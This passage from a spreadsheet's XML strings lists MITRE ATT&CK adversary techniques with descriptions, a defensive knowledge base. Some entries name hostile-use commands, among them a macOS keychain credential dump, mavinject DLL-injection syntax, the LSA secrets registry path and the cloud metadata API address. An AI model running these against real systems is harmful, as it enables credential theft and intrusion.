https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)
https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)
https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
Adversaries may use commands such as &lt;code&gt;gpresult&lt;/code&gt; or various publicly available PowerShell functions, such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>Mavinject</t>
  </si>
  <si>
    <t>Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. &lt;code&gt;C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. 
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  &lt;code&gt;/HMODULE&lt;/code&gt; command-line parameter (ex. &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)
https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) 
Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.
https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. 
Keychains can be viewed and edited through the Keychain Access application or using the command-line utility &lt;code&gt;security&lt;/code&gt;. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)
Adversaries may gather user credentials from Keychain storage/memory. For example, the command &lt;code&gt;security dump-keychain –d&lt;/code&gt; will dump all Login Keychain credentials from &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Adversaries may also directly read Login Keychain credentials from the &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt; file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)
https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>SAML Tokens</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>T1036.008</t>
  </si>
  <si>
    <t>Masquerade File Type</t>
  </si>
  <si>
    <t>Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file,  is &lt;code&gt; 0xFF 0xD8&lt;/code&gt; and the file extension is either `.JPE`, `.JPEG` or `.JPG`. 
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. 
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of &lt;code&gt;test.gif&lt;/code&gt;. A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)
https://attack.mitre.org/techniques/T1036/008</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)
https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>T1652</t>
  </si>
  <si>
    <t>Device Driver Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)
On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
